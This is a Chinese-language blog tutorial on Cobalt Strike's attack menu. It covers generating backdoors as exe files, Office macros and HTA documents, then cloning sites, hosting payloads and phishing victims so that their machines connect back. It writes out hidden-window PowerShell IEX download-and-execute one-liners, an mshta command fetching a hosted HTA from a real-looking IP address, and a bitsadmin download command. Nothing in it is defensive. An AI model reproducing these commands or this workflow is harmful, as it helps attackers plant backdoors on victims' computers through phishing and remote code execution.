CS之攻击菜单详解-后门生成与上线
目錄
一、生成后門
windows可執行程序exe
payload生成器
Office宏
HTA文檔
二、Web釣魚
網站克隆
文件托管
web投遞
簽名Applet攻擊和智能Applet攻擊
信息收集
站點管理
三、郵件釣魚
在創建完監聽器后 ——> CS監聽器配置,接下來進行后門的生成
一、生成后門
能夠生成如HTA文檔、office宏、payload生成器、exe程序。
windows可執行程序exe
可以看到能生成兩種windows可執行程序,其分別代表stage分階段和unstage(stageless)不分階段。傳送門 ——>?Cobalt Strike中payload的stage與unstage區別
選擇監聽器后,按需生成不同類型的exe
然后在目標機器運行即可上線
payload生成器
該模塊可以生成多種語言的后門Payload,包括C, C#, Python, Java, Perl, Powershell腳本,Powershell命令,Ruby, Raw,免殺框架Veli中的shellcode等。
傳送門 ——>?CS payload生成器(Generator)介紹與上線方式
Office宏
宏病毒是一種常見的計算機病毒,寄存在文檔或模板中,并不會直接感染可執行程序。但是打開攜帶宏病毒的文檔,其中的命令就會被執行,導致文檔所在電腦主機被感染。
傳送門——>?CobaltStrike 生成office宏病毒進行釣魚攻擊
HTA文檔
HTA是HTML Application的縮寫(HTML應用程序),是軟件開發的新概念,直接將HTML保存成HTA的格式,就是一個獨立的應用軟件,其里面可包含html、js、vb等語言。其和VB、C++等程序語言所設計的軟件界面沒什么差別。雙擊hta文件就能運行
CobaltStrike可生成三種類型的hta文件,分別是Executable、Powershell、VBA
?這三類樣本的區別在于:
- Executable 將會在hta文件中內嵌一個PE文件
- Powershell 將會在hta文件中內嵌一段Powershell代碼
- VBA 將會在hta文件中內嵌一段VBA代碼
1. 生成powershell類型的hta文檔
類容如下
雙擊程序運行,主機上線
?另外兩種不推薦使用,因為會報錯如下界面:
二、Web釣魚
web釣魚模塊中有如下選項
網站克隆
克隆就是克隆一個與目標網站看起來一模一樣的站點,然后可以在里面插入攻擊代碼,進行釣魚攻擊
傳送門——>?cs克隆目標站點
文件托管
如上,我們生成了一個hta類型的后門文件,此時需要放在目標機器上雙擊才能運行,這樣是不是有點麻煩了?我們就想能不能把它放在自己的網站上,然后執行命令就能自動下載啟動了?文件托管就是托管一個文件,提供一個文件下載
1. 對生產的evil.hta文件進行托管
如下,填寫好后點擊運行
生成鏈接,只要訪問該鏈接就能將文件下載
運行:mshta http://39.100.88.162:80/download/file.ext,就會對該文件進行下載和運行。主機即可上線
ps:?mshta是Windows內置的一個程序,主要用于執行HTA程序 ,mshta可以直接執行遠端的hta程序
?
web投遞
上面的文件托管需要我們自己選擇一個文件進行托管。而web投遞則是生成并托管一個payload,通過訪問這個url就能下載該payload甚至直接執行。
如下填寫好,可見生成的payload類型有多種
1. payload為powershell
點擊運行,為一段ps腳本,意思為遠程下載腳本并運行。復制此 直接在主機上運行就能自動下載payload并上線上線
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://39.xx.xx.162:80/a'))"
2.?payload為powershell IEX
iex是 Invoke-Expression命令 的簡寫,用于執行字符串中的命令 如:iex "ls"
生成powershell iex的payload類型,可見比上面ps類型少了前面執行的部分
IEX ((new-object net.webclient).downloadstring('http://39.xx.xx.162:8000/a'))
3. payload為exe
可以直接訪問下載exe
4. payload為bitsadmin
Background Intelligent Transfer Service Admin(BITSAdmin) 是一個命令行工具,可以創建下載或上傳文件并監控其進度。BITSAdmin是與windows xp一起發布的。
transfer參數是從遠程服務器下載到本機的簡單便捷的方法。需要定義傳輸任務的名稱,可以是任何名字。在示例中,將所有的傳輸任務定義為hackingarticles。在定義名稱后需要輸入遠程服務器文件名的位置。在遠程服務器上有一個名為ignite.png的示例圖像文件。需要本地的路徑和名稱。如下例子:
bitsadmin /transfer hackingarticles http://192.168.1.13/ignite.png c:\ignite.png
所以可以利用bitsadmin工具進行payload下載與運行
在cmd中運行復制的url
?
如下,上線?
簽名Applet攻擊和智能Applet攻擊
- 簽名Applet攻擊:Java Signed Applet Attack,這個攻擊會啟動一個 web 服務器來托管一個自簽名的 Java applet(用Java語言編寫的小應用程序,可以直接嵌入到網頁中,并能夠產生特殊的效果。)。訪客被要求給這個 applet 權限來運行。當一個訪客準許了這個權限,你就獲取了到他們系統的權限。
- 智能Applet攻擊:Java Smart Applet Attack,這個applet分析它的環境并決定使用哪個Java漏洞利用。如果Java版本是有漏洞的,此applet會禁用安全沙箱,并使用Cobalt Strike的Java注入器執行payload。
這兩攻擊就不太想嘗試了,因為很少很少有主機會存在applet的運行環境。(我也不知道怎么利用~~)
信息收集
生活一個網站39.100.xx.xx,只要一訪問就跳轉到百度的頁面
然后能在 web日志中看到訪問者的一些信息,如ip,訪問使用的瀏覽器名稱和版本
站點管理
以上生成的站點,我們可以在web站點管理中查看
如?
三、郵件釣魚
這個模塊還是不建議使用,因為有更好的釣魚工具,如swaks ——>?swaks郵件偽造
總結
以上是生活随笔為你收集整理的CS之攻击菜单详解-后门生成与上线的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 【时间序列分析】02. 线性平稳序列
- 下一篇: Sentry安装教程